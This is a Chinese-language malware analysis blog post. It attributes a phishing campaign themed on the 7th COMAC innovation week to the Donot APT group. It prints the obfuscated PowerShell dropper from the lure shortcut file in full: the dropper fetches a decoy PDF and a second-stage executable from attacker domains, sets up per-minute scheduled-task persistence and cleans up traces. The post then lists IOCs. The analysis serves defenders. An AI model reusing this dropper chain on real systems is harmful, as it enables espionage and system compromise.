APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击

APT 4个月前 admin
681 0 0

一、前言

本次样本于日常威胁狩猎工作中发现,样本利用“中国商用飞机有限责任公司等单位主办的第七届COMAC国际科技创新周”主题进行钓鱼攻击,经样本同源分析归属于APT组织Donot。


如下主题文件用于迷惑用户打开了合法文档。APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击

二、背景

肚脑虫组织,又名Donot,被认为具有南亚某国政府背景。该组织主要针对政府机构、国防军事部门以及商务领域重要人士实施网络间谍活动,受害者包括中国以及巴基斯坦、斯里兰卡等南亚地区国家。

三、样本分析

3.1 第一阶段

初始载荷快捷方式文件“COMAC_Technology_Innovation”,其中包含”目标“指向恶意载荷。

APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击载荷通过PowerShell下载文件、执行文件、创建计划任务等。

APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击

详细功能如下。

  • 设置 $ProgressPreference 为 ‘SilentlyContinue’,执行下载或其他操作时不显示进度信息,行为隐藏。

  • 调用Invoke-WebRequest(iwr)下载用于迷惑用户的中文主题PDF文件,并调用Start-Process(saps)启动。

APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击
  • 调用Invoke-WebRequest(iwr)下载文件并保存为C:UsersPublicsam,并且重命名为Update.exe。
  • 创建计划任务TaskReportingUpdate,每分钟执行一次Update.exe。
APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击
  • 痕迹清理

原始恶意载荷如下。

C:WindowsSystem32conhost.exe%......WindowsSystem32conhost.exe?
powershell$ProgressPreference='SilentlyContinue';
i''w''rhttps://xingyu.ghshijie.com/cvbcolo09/tqerwer8-OutFileC:\\Users\\Public\\COMAC_Technology_Innovation.pdf;
s''a''p''sC:\\Users\\Public\\COMAC_Technology_Innovation.pdf;
i''w''rhttps://Yuxuan.ghshijie.com/jlytw07sev/fuol91mv-OutFileC:\\Users\\Public\\sam;
r''e''n-PathC:\\Users\\Public\\sam-NewNameC:\\Users\\Public\\Update.exe;
c''p''iC:\\Users\\Public\\COMAC_Technology_Innovation.pdf-destination.;
s''c''h''ta''s''k''s/c''r''e''a''t''e/S''cminute/T''nTaskReportingUpdate/t''r"C:\\Users\\Public\\Update";
e''r''a''s''e*?f.?n?<C:ProgramFiles(x86)MicrosoftEdgeApplicationmsedge.exe

3.2 第二、三阶段

详细的样本分析空了写写,这里简单过一下。

二阶段载荷样本Update.exe基本信息如下。APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击

经过字符和环境初始化、反调试操作后,硬编码在样本中的字符数组”aAm2uiegdx3lrye“,包含大段的base64编码存放密文shellcode。

APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击

完成多重解码、解密操作后获取下一阶段明文载荷,调用内核函数,开辟、写入shellcode在内存中,通过异步过程调用执行解密的shellode。

APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击shellcode载荷如下,长度0x5EA80。

APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击
shellcode部分主要功能如图。

APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击

IOC

hxxps://xingyu.ghshijie.com/cvbcolo09/tqerwer8-OutFile hxxps://Yuxuan.ghshijie.com/jlytw07sev/fuol91mv-OutFile telsiairegion.xyz xingyu.ghshijie.com Yuxuan.ghshijie.com

8435ed22a631297a13bb3c265b4b71fc d982b2e08ce748b6bbfdbaf11f649a5b c58a7c4baffa401c71a1a333ecd0f956

原文始发于微信公众号(帅仔回忆录):APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击

版权声明:admin 发表于 2024年7月30日 上午8:21。
转载请注明:APT组织Donot利用“第七届COMAC国际科技创新周”主题进行钓鱼攻击 | CTF导航

相关文章